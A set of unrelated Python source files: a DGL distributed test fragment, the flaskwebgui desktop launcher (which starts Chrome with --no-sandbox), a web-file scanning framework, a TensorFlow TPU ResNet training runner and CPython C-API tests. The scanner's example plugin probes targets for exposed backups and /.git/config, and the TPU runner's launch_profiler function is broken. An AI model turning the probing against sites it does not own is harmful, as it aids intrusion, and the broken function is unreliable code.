all_edges = np.nonzero(edge_mask)[0]
assert np.all(all_nodes == F.asnumpy(all_nodes1))
assert np.all(all_edges == F.asnumpy(all_edges1))
assert np.all(all_nodes == F.asnumpy(all_nodes2))
assert np.all(all_edges == F.asnumpy(all_edges2))
def prepare_dist():
ip_config = open("kv_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('{}\n'.format(ip_addr))
ip_config.close()
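# Illustrative sketch, not part of the test suite above: how a distributed trainer
# typically calls node_split() outside of a test. It assumes dgl.distributed.initialize()
# has already been called and that the DistGraph carries a boolean 'train_mask' node
# feature; both the function name and the feature name are placeholders.
def _example_trainer_node_split(dist_g):
    # Each trainer gets a disjoint, roughly even share of the masked nodes; with the
    # default rank, the split follows this process's trainer rank from the role manager.
    pb = dist_g.get_partition_book()
    return node_split(dist_g.ndata['train_mask'], pb, force_even=True)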
if __name__ == '__main__':
os.makedirs('/tmp/dist_graph', exist_ok=True)
test_dist_emb_server_client()
test_server_client()
test_split()
test_split_even()
test_standalone()
test_standalone_node_emb()
|
flaskwebgui.py
|
__version__ = "0.3.0"
import os
import sys
import time
from datetime import datetime
import logging
import tempfile
import socketserver
import subprocess as sps
from inspect import isfunction
from threading import Lock, Thread
logging.basicConfig(level=logging.INFO, format='flaskwebgui - [%(levelname)s] - %(message)s')
# UTILS
def find_chrome_mac():
default_dir = r'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
if os.path.exists(default_dir):
return default_dir
# use mdfind ci to locate Chrome in alternate locations and return the first one
name = 'Google Chrome.app'
alternate_dirs = [x for x in sps.check_output(["mdfind", name]).decode().split('\n') if x.endswith(name)]
if len(alternate_dirs):
return alternate_dirs[0] + '/Contents/MacOS/Google Chrome'
return None
def find_chrome_linux():
try:
import whichcraft as wch
except Exception as e:
raise Exception("whichcraft module is not installed/found \
please fill browser_path parameter or install whichcraft!") from e
chrome_names = ['chromium-browser',
'chromium',
'google-chrome',
'google-chrome-stable']
for name in chrome_names:
chrome = wch.which(name)
if chrome is not None:
return chrome
return None
def find_chrome_win():
    # use Edge by default since it's built on Chromium
    edge_path = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
if os.path.exists(edge_path):
return edge_path
import winreg as reg
reg_path = r'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe'
chrome_path = None
last_exception = None
for install_type in reg.HKEY_CURRENT_USER, reg.HKEY_LOCAL_MACHINE:
try:
reg_key = reg.OpenKey(install_type, reg_path, 0, reg.KEY_READ)
chrome_path = reg.QueryValue(reg_key, None)
reg_key.Close()
except WindowsError as e:
last_exception = e
else:
if chrome_path and len(chrome_path) > 0:
break
# Only log some debug info if we failed completely to find chrome
if not chrome_path:
logging.exception(last_exception)
logging.error("Failed to detect chrome location from registry")
else:
logging.info(f"Chrome path detected as: {chrome_path}")
return chrome_path
def get_default_chrome_path():
"""
Credits for get_instance_path, find_chrome_mac, find_chrome_linux, find_chrome_win funcs
got from: https://github.com/ChrisKnott/Eel/blob/master/eel/chrome.py
"""
if sys.platform in ['win32', 'win64']:
return find_chrome_win()
elif sys.platform in ['darwin']:
return find_chrome_mac()
elif sys.platform.startswith('linux'):
return find_chrome_linux()
# class FlaskwebguiDjangoMiddleware:
# def __init__(self, get_response=None):
# self.get_response = get_response
# def __call__(self, request):
# response = self.get_response(request)
# return response
current_timestamp = None
class FlaskUI:
def __init__(self,
app,
start_server='flask',
width=800,
height=600,
maximized=False,
fullscreen=False,
browser_path=None,
socketio=None,
on_exit=None,
idle_interval=5
) -> None:
self.app = app
        self.start_server = start_server if isfunction(start_server) else str(start_server).lower()
self.width = str(width)
self.height= str(height)
self.fullscreen = fullscreen
self.maximized = maximized
self.browser_path = browser_path if browser_path else get_default_chrome_path()
self.socketio = socketio
self.on_exit = on_exit
self.idle_interval = idle_interval
self.set_url()
self.webserver_dispacher = {
"flask": self.start_flask,
"flask-socketio": self.start_flask_socketio,
"django": self.start_django,
"fastapi": self.start_fastapi
}
self.supported_frameworks = list(self.webserver_dispacher.keys())
self.lock = Lock()
def update_timestamp(self):
self.lock.acquire()
global current_timestamp
current_timestamp = datetime.now()
self.lock.release()
def run(self):
"""
        Starts 3 threads: one for the web framework server, one for the browser GUI,
        and one that watches for idleness and stops the server.
"""
self.update_timestamp()
t_start_webserver = Thread(target=self.start_webserver)
t_open_chromium = Thread(target=self.open_chromium)
t_stop_webserver = Thread(target=self.stop_webserver)
threads = [t_start_webserver, t_open_chromium, t_stop_webserver]
for t in threads: t.start()
for t in threads: t.join()
def set_url(self):
with socketserver.TCPServer(("localhost", 0), None) as s:
free_port = s.server_address[1]
self.host = '127.0.0.1'
self.port = free_port
self.localhost = f"http://{self.host}:{self.port}"
def start_webserver(self):
        if isfunction(self.start_server):
            self.start_server()
            return
        if self.start_server not in self.supported_frameworks:
raise Exception(f"'start_server'({self.start_server}) not in {','.join(self.supported_frameworks)} and also not a function which starts the webframework")
self.webserver_dispacher[self.start_server]()
def add_flask_middleware(self):
@self.app.after_request
def keep_alive_after_request(response):
self.keep_server_running()
return response
def start_flask(self):
self.add_flask_middleware()
try:
import waitress
waitress.serve(self.app, host=self.host, port=self.port)
        except Exception:
self.app.run(host=self.host, port=self.port)
def start_flask_socketio(self):
self.add_flask_middleware()
self.socketio.run(self.app, host=self.host, port=self.port)
def start_django(self):
try:
import waitress
waitress.serve(self.app, host=self.host, port=self.port)
        except Exception:
            # os.system() reports failure through its return code instead of raising,
            # so fall back from python3 (linux/mac) to python (windows) on a non-zero code.
            if os.system(f"python3 manage.py runserver {self.port}") != 0:
                os.system(f"python manage.py runserver {self.port}")
def add_fastapi_middleware(self):
@self.app.middleware("http")
async def keep_alive_after_request(request, call_next):
response = await call_next(request)
self.keep_server_running()
return response
def start_fastapi(self):
import uvicorn
self.add_fastapi_middleware()
uvicorn.run(self.app, host=self.host, port=self.port, log_level="warning")
def open_chromium(self):
"""
Open the browser selected (by default it looks for chrome)
# https://peter.sh/experiments/chromium-command-line-switches/
"""
logging.info(f"Opening browser at {self.localhost}")
temp_profile_dir = os.path.join(tempfile.gettempdir(), "flaskwebgui")
if self.browser_path:
launch_options = None
if self.fullscreen:
launch_options = ["--start-fullscreen"]
elif self.maximized:
launch_options = ["--start-maximized"]
else:
launch_options = [f"--window-size={self.width},{self.height}"]
options = [
self.browser_path,
f"--user-data-dir={temp_profile_dir}",
"--new-window",
"--no-sandbox",
"--no-first-run",
# "--window-position=0,0"
] + launch_options + [f'--app={self.localhost}']
sps.Popen(options, stdout=sps.PIPE, stderr=sps.PIPE, stdin=sps.PIPE)
else:
import webbrowser
webbrowser.open_new(self.localhost)
def stop_webserver(self):
#TODO add middleware for Django
if self.start_server == 'django':
logging.info("Middleware not implemented (yet) for Django.")
return
while True:
self.lock.acquire()
global current_timestamp
delta_seconds = (datetime.now() - current_timestamp).total_seconds()
self.lock.release()
if delta_seconds > self.idle_interval:
logging.info("App closed")
break
time.sleep(self.idle_interval)
if isfunction(self.on_exit):
logging.info(f"Executing {self.on_exit.__name__} function...")
self.on_exit()
logging.info("Closing connections...")
os.kill(os.getpid(), 9)
def keep_server_running(self):
self.update_timestamp()
return "Ok"
|
WebFileCheckBase.py
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
"""
WebFile check base framework
Author: Rookie
E-mail: hyll8882019@outlook.com
"""
from collections import deque
from threading import Thread
from RookieTools.logger import logger
from RookieTools.ip import is_special_ip
from RookieTools.common import downloader
from RookieTools.CheckBase import CheckBase, abstractmethod
class WebFileCheckBase(CheckBase):
PluginName = None
ThreadNumber = 10
DEBUG = False
GetOneResult = False
def __init__(self, url):
self.url = url
self.tasks = deque()
self.result = []
super(WebFileCheckBase, self).__init__()
@abstractmethod
def tasks_init(self):
pass
def init_check(self) -> bool:
resp = downloader(self.url, stream=True, output_error=self.DEBUG)
if resp is None:
return False
try:
return not is_special_ip(resp.raw._connection.sock.getpeername()[0])
except AttributeError:
pass
except Exception as e:
logger.exception(e)
return False
finally:
resp.close()
@abstractmethod
def check(self, path):
pass
def work_in(self):
while True:
try:
path = self.tasks.popleft()
except IndexError:
break
if self.check(path) and self.result:
with self.file_lock:
self.pipe(self.result)
if self.GetOneResult:
self.clean_tasks()
def run(self):
status = self.init_check()
        logger.info('% -40s %s %s' % (self.url, self.PluginName, 'initial check passed' if status else 'initial check failed'))
if status:
self.tasks_init()
thds = [Thread(target=self.work_in) for _ in range(self.ThreadNumber)]
[thd.start() for thd in thds]
[thd.join() for thd in thds]
@abstractmethod
def pipe(self, result):
pass
def clean_tasks(self):
with self.task_lock:
if len(self.tasks):
                logger.info('% -40s clearing the task queue, please wait...' % self.url)
self.tasks.clear()
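# Illustrative sketch of a concrete plugin, not part of the framework. It assumes that
# downloader() returns a requests-style Response (or None), as the base class already
# relies on; the plugin name, candidate paths, and the 200 status check are made up
# purely for the example.
class _ExampleBackupFileCheck(WebFileCheckBase):
    PluginName = 'example-backup-file'

    def tasks_init(self):
        # queue a few candidate paths relative to the target URL
        for path in ('/backup.zip', '/www.tar.gz', '/.git/config'):
            self.tasks.append(path)

    def check(self, path):
        target = self.url.rstrip('/') + path
        resp = downloader(target, output_error=self.DEBUG)
        if resp is not None and resp.status_code == 200:
            self.result.append(target)
            return True
        return False

    def pipe(self, result):
        for item in result:
            logger.info('found: %s' % item)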
|
train_and_eval_runner.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bypass TPUEstimator for ResNet-50 Train."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import os
import threading
import time
from absl import flags
from six.moves import queue as Queue
import tensorflow as tf
from tensorflow.contrib import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_function
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.framework import graph_io
from mlp_log import mlp_log
FLAGS = flags.FLAGS
_INITIAL_LOSS = 1e7
_STOP = -1
# Decorator function for tpu computation func that was passed to tpu.rewrite()
# if there are embedded train and eval loops in this func, trace tools will
# generate step markers for each iteration.
def on_device_train_and_eval_loops(func):
# Value for this attribute is from xla.DebugOptions.StepMarkerLocation.
setattr(func, "step_marker_location", "STEP_MARK_AT_SECOND_LEVEL_WHILE_LOOP")
return func
def device_for_tpu_core(host_name, core=0):
return host_name + "/device:TPU_REPLICATED_CORE:%d" % core
def device_for_host(host_name):
return host_name + "/device:CPU:0"
def wrap_computation_in_while_loop(op_fn, n, host_name, parallel_iterations=1):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
ops = op_fn()
if not isinstance(ops, list):
ops = [ops]
with tf.control_dependencies(ops):
return i + 1
with tf.device(device_for_host(host_name)):
return tf.while_loop(
lambda i: tf.less(i, n),
computation, [tf.constant(0)],
parallel_iterations=parallel_iterations)
def tpu_ordinal_fn(shard_index_in_host):
"""Return the TPU ordinal associated with a shard.
Required because the enqueue ops are placed on CPU.
Args:
shard_index_in_host: the shard index
Returns:
The ordinal of the TPU device the shard's infeed should be placed on.
"""
return shard_index_in_host % FLAGS.tpu_cores_per_host
def _profiler_callback(comment, session_id):
if session_id is None:
tf.logging.info("Profiling failed for %s", comment)
else:
tf.logging.info("Profiling succeeded for %s. Overview page url:", comment)
class TrainAndEvalRunner(object):
"""Remove init overheads in TPU Estimator via direct session.run calls."""
def __init__(self, iterations, train_steps, eval_steps):
tf.logging.info("TrainAndEvalRunner: constructor")
self.feature_structure = {}
self.eval_feature_structure = {}
self.loss = None
self.eval_loss = None
self.infeed_queue = []
self.eval_infeed_queue = []
self.enqueue_ops = []
self.num_hosts = FLAGS.num_cores // FLAGS.tpu_cores_per_host
self.dequeue_ops = []
self.queue = Queue.Queue()
self.eval_enqueue_ops = []
self.dataset_initializer = []
self.eval_dataset_initializer = []
self.iterations = iterations
self.steps_per_epoch = FLAGS.num_train_images // FLAGS.train_batch_size
self.iterator = None
self.sess = None
self.input_sess = None
self.eval_input_sess = None
self.eval_output_sess = None
self.infeed_thread = None
self.train_eval_thread = None
self.graph = tf.Graph()
self.input_graph = tf.Graph()
self.eval_input_graph = tf.Graph()
self.eval_output_graph = tf.Graph()
if train_steps % iterations != 0:
train_steps = iterations * int(math.ceil(train_steps / iterations))
self.train_steps = train_steps
self.max_train_iterations = self.train_steps // iterations
self.eval_steps = int(eval_steps)
self.eval_batch_size = FLAGS.eval_batch_size
tpu_init = [tpu.initialize_system()]
self.tpu_shutdown = tpu.shutdown_system()
self.tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu or FLAGS.master,
zone=FLAGS.tpu_zone,
project=FLAGS.gcp_project)
self.config = tf.ConfigProto(
operation_timeout_in_ms=600 * 60 * 1000,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
cluster_spec = self.tpu_cluster_resolver.cluster_spec()
if cluster_spec:
self.config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
self.master = self.tpu_cluster_resolver.get_master()
self.init_sess = tf.Session(self.master, config=self.config)
self.init_sess.run(tpu_init)
def get_host(self, host_id):
if self.master in ("", "local"):
return "/replica:0/task:0"
job_name = self.tpu_cluster_resolver.get_job_name() or "tpu_worker"
return "/job:%s/task:%d" % (job_name, host_id)
def build_enqueue_ops(self, input_fn, params, host_id, is_training=True):
"""Build enqueue operations for the input pipeline in a given host.
Args:
input_fn: dataset input graph generation function
params: input function parameters
host_id: host identifier
is_training: boolean indicates if it is training
"""
iparams = {}
iparams["batch_size"] = params["batch_size"] // FLAGS.num_cores
iparams["dataset_num_shards"] = self.num_hosts
def get_enqueue_ops_fn():
"""Generate the enqueue ops graph function."""
iparams["dataset_index"] = host_id
with tf.device(device_for_host(self.get_host(host_id))):
dataset = input_fn(iparams)
if not is_training:
dataset = dataset.cache()
dataset = dataset.repeat()
iterator = dataset.make_initializable_iterator()
if is_training:
self.dataset_initializer.append(iterator.initializer)
else:
self.eval_dataset_initializer.append(iterator.initializer)
def enqueue_ops_fn():
"""Generate the infeed enqueue ops graph."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(FLAGS.tpu_cores_per_host):
with tf.control_dependencies(control_deps):
features, labels = iterator.get_next()
if is_training:
self.feature_structure["features"] = features
self.feature_structure["labels"] = labels
flattened_inputs = data_nest.flatten(self.feature_structure)
else:
self.eval_feature_structure["features"] = features
self.eval_feature_structure["labels"] = labels
flattened_inputs = data_nest.flatten(self.eval_feature_structure)
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed = tpu.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
if is_training:
self.infeed_queue.append(infeed)
else:
self.eval_infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)
return enqueue_ops_fn
if is_training:
with self.input_graph.as_default():
self.enqueue_ops.append(
wrap_computation_in_while_loop(
get_enqueue_ops_fn(),
n=self.iterations,
host_name=self.get_host(host_id),
parallel_iterations=1))
else:
with self.eval_input_graph.as_default():
self.eval_enqueue_ops.append(
wrap_computation_in_while_loop(
get_enqueue_ops_fn(),
host_name=self.get_host(host_id),
n=self.eval_steps,
parallel_iterations=1))
def get_tpu_step(self, mparams, model_fn, is_training=True):
"""Get the TPU graph generation function."""
def tpu_step(loss):
"""Generate the TPU graph."""
del loss
if is_training:
values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
unflattened_inputs = data_nest.pack_sequence_as(self.feature_structure,
values)
else:
values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)
unflattened_inputs = data_nest.pack_sequence_as(
self.eval_feature_structure, values)
features = unflattened_inputs["features"]
labels = unflattened_inputs["labels"]
if is_training:
estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,
mparams)
loss, train_op = estimator_spec.loss, estimator_spec.train_op
with tf.device(device_for_tpu_core(self.get_host(0))):
with tf.control_dependencies([train_op]):
return tf.identity(loss)
else:
estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.EVAL,
mparams)
loss = estimator_spec.loss
self.eval_metrics = estimator_spec.eval_metrics
self.eval_tensors = estimator_spec.eval_metrics[1]
for _ in self.eval_tensors:
self.dequeue_ops.append([])
with tf.device(device_for_tpu_core(self.get_host(0))):
outfeed_enqueue_ops = tpu.outfeed_enqueue_tuple(self.eval_tensors)
with tf.control_dependencies([outfeed_enqueue_ops]):
return tf.identity(loss)
return tpu_step
def launch_profiler(self):
"""Launches a profiling session to collect a trace from worker-0."""
if result == profiler_client.PROFILED_IN_NEW_THREAD:
tf.logging.info("A profiler session launched in a new thread.")
else:
tf.logging.info("profiler.collect() failed.")
def initialize(self, train_input_fn, eval_input_fn, model_fn, params):
"""Build graphs for the TPU device and the input pipelines.
Args:
train_input_fn: Dataset input graph generation function for training.
      eval_input_fn: Dataset input graph generation function for evaluation.
model_fn: Model definition function
params: Parameters to input and model functions
"""
tf.logging.info("TrainAndEvalRunner: initialize method")
self.build_enqueue_ops(train_input_fn, params, 0)
# Start the build of the model
tpu_step = self.get_tpu_step(params, model_fn)
@tpu_function.on_device_training_loop
def train_loop():
with tf.variable_scope("resnet", reuse=tf.AUTO_REUSE):
return tpu.repeat(self.iterations, tpu_step, [_INITIAL_LOSS])
self.train_loop = train_loop
# Build tpu train model session and initialize graph
self.initialize_eval(params, eval_input_fn, model_fn)
# Build the infeed graph
i = 1
while i < self.num_hosts:
self.build_enqueue_ops(train_input_fn, params, i)
i = i + 1
self.sess = tf.Session(self.master, graph=self.graph, config=self.config)
self.input_sess = tf.Session(
self.master, graph=self.input_graph, config=self.config)
self.input_sess.run(self.dataset_initializer)
self.eval_input_sess = tf.Session(
self.master, graph=self.eval_input_graph, config=self.config)
self.eval_input_sess.run(self.eval_dataset_initializer)
self.eval_output_sess = tf.Session(
self.master, graph=self.eval_output_graph, config=self.config)
with self.graph.as_default():
self.sess.run(tf.global_variables_initializer())
self.sess.run(tf.local_variables_initializer())
def train_eval_thread_fn(sess, train_eval_op):
sess.run([train_eval_op])
# Start the just in time compilation of the model function
self.train_eval_thread = threading.Thread(
target=train_eval_thread_fn, args=(self.sess, self.train_eval_op))
self.train_eval_thread.start()
    # Sleep to give the just-in-time compilation time to finish
time.sleep(60)
def initialize_eval(self, params, eval_input_fn, model_fn):
"""Initialize eval."""
self.eval_infeed_queue = []
for i in range(0, self.num_hosts):
self.build_enqueue_ops(
eval_input_fn, params, host_id=i, is_training=False)
eval_step = self.get_tpu_step(params, model_fn, is_training=False)
@tpu_function.on_device_training_loop
def eval_loop():
with tf.variable_scope("resnet", reuse=tf.AUTO_REUSE):
return tpu.repeat(int(self.eval_steps), eval_step, [_INITIAL_LOSS])
def train_eval_step(loss):
del loss
with tf.control_dependencies(self.train_loop()):
return eval_loop()
@on_device_train_and_eval_loops
def train_eval_loop():
return tpu.repeat(self.max_train_iterations, train_eval_step,
[_INITIAL_LOSS])
def create_dequeue_ops(host_id):
"""Create deque ops graph function."""
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for v in self.eval_tensors:
dequeue_ops.append([])
tensor_dtypes.append(v.dtype)
tensor_shapes.append(v.shape)
for i in range(FLAGS.tpu_cores_per_host):
with tf.device(device_for_host(self.get_host(host_id))):
outfeed_tensors = tpu.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes, device_ordinal=i)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
for j in range(len(outfeed_tensors)):
dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)
return dequeue_ops
with self.graph.as_default():
with tf.variable_scope("resnet", reuse=True):
(self.train_eval_op,) = tpu.shard(
train_eval_loop,
inputs=[],
num_shards=FLAGS.num_cores,
outputs_from_all_shards=False)
      graph_io.write_graph(self.graph.as_graph_def(add_shapes=True),
                           FLAGS.model_dir, "graph.pbtxt")
with self.eval_output_graph.as_default():
with tf.variable_scope("resnet", reuse=True):
for i in range(0, self.num_hosts):
host_dequeue_ops = create_dequeue_ops(i)
          for j, dequeue_tensor in enumerate(host_dequeue_ops):
            self.dequeue_ops[j].append(dequeue_tensor)
for j, _ in enumerate(self.eval_tensors):
self.dequeue_ops[j] = tf.concat(self.dequeue_ops[j], axis=0)
with tf.device(device_for_host(self.get_host(0))):
metrics = self.eval_metrics[0](*self.dequeue_ops)
metric_update_ops = []
metric_value_ops = {}
for (k, v) in metrics.items():
metric_update_ops.append(v[1])
metric_value_ops[k] = v[0]
self.metric_update_ops = metric_update_ops
self.metric_value_ops = metric_value_ops
self.metric_initializer = tf.variables_initializer(
tf.get_collection(tf.GraphKeys.METRIC_VARIABLES))
def train_and_eval(self, output_summaries=False, enable_tracing=True):
"""Run the Train steps on the TPU device."""
if output_summaries:
output_dir = os.path.join(FLAGS.model_dir, "eval")
tf.gfile.MakeDirs(output_dir)
# Summary writer writes out eval metrics.
summary_writer = tf.summary.FileWriter(output_dir)
def infeed_thread_fn():
"""Build and infeed session.run calls in a background thread."""
# Build infeed sesssion
# Run infeed session.run calls
tf.logging.info("Start infeed thread")
for _ in range(self.train_steps // self.iterations):
self.input_sess.run([self.enqueue_ops])
self.eval_input_sess.run([self.eval_enqueue_ops])
self.infeed_thread = threading.Thread(target=infeed_thread_fn)
self.infeed_thread.start()
# Gather trace for the first few steps.
if enable_tracing:
self.launch_profiler()
cur_step = 0
success = False
while cur_step < self.train_steps:
start = time.time()
tf.logging.info("TrainAndEvalRunner: start next %d steps",
self.iterations)
cur_step += self.iterations
epoch = cur_step // self.steps_per_epoch - 1
mlp_log.mlperf_print(
"block_start", None, metadata={"first_epoch_num": epoch + 1,
"epoch_count": 4})
eval_results = self.eval(self.eval_steps)
end = time.time()
tf.logging.info(
"TrainAndEvalRunner: step {} step time {} sec {} examples/sec".format(
cur_step, end - start,
self.iterations * FLAGS.train_batch_size / (end - start)))
# Run eval.
# Write out summary to tensorboard.
if output_summaries:
with tf.Graph().as_default():
summaries = []
for metric in eval_results:
summaries.append(
tf.Summary.Value(tag=metric, simple_value=eval_results[metric]))
tf_summary = tf.Summary(value=list(summaries))
summary_writer.add_summary(tf_summary, cur_step)
# MLPerf logging for eval results.
mlp_log.mlperf_print(
"eval_accuracy",
float(eval_results["top_1_accuracy"]),
metadata={"epoch_num": epoch + 1})
mlp_log.mlperf_print(
"block_stop", None, metadata={"first_epoch_num": epoch + 1})
tf.logging.info("Eval results at step %d: %s", cur_step, eval_results)
if eval_results["top_1_accuracy"] >= FLAGS.stop_threshold:
success = True
mlp_log.mlperf_print("run_stop", None, metadata={"status": "success"})
break
if enable_tracing and cur_step > self.train_steps // 4:
self.launch_profiler()
enable_tracing = False
if not success:
mlp_log.mlperf_print("run_stop", None, metadata={"status": "abort"})
mlp_log.mlperf_print("run_final", None)
if output_summaries:
summary_writer.close()
def eval(self, num_steps):
"""Run the Eval steps on the TPU device.
Args:
num_steps: number of steps to run eval
Returns:
A dictionary of evaluation results.
"""
self.eval_output_sess.run(self.metric_initializer)
eval_results = {}
tf.logging.info("Starting Eval on %d steps batch size %d" %
(num_steps, self.eval_batch_size))
for _ in range(num_steps):
_ = self.eval_output_sess.run(self.metric_update_ops)
# Compute eval metrics
session_out = self.eval_output_sess.run(self.metric_value_ops)
eval_results["top_1_accuracy"] = session_out["top_1_accuracy"]
return eval_results
def shutdown(self):
self.queue.put(_STOP)
self.train_eval_thread.join()
self.infeed_thread.join()
self.sess.close()
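# Illustrative driver sketch, not part of the runner: the expected call order when
# wiring the runner to real input and model functions. The step counts are arbitrary
# and train_input_fn/eval_input_fn/model_fn are placeholders supplied by the MLPerf
# harness, not names defined in this file.
def _example_driver(train_input_fn, eval_input_fn, model_fn):
  params = {"batch_size": FLAGS.train_batch_size}
  runner = TrainAndEvalRunner(iterations=100, train_steps=112590, eval_steps=48)
  runner.initialize(train_input_fn, eval_input_fn, model_fn, params)
  runner.train_and_eval(output_summaries=True)
  runner.shutdown()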
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
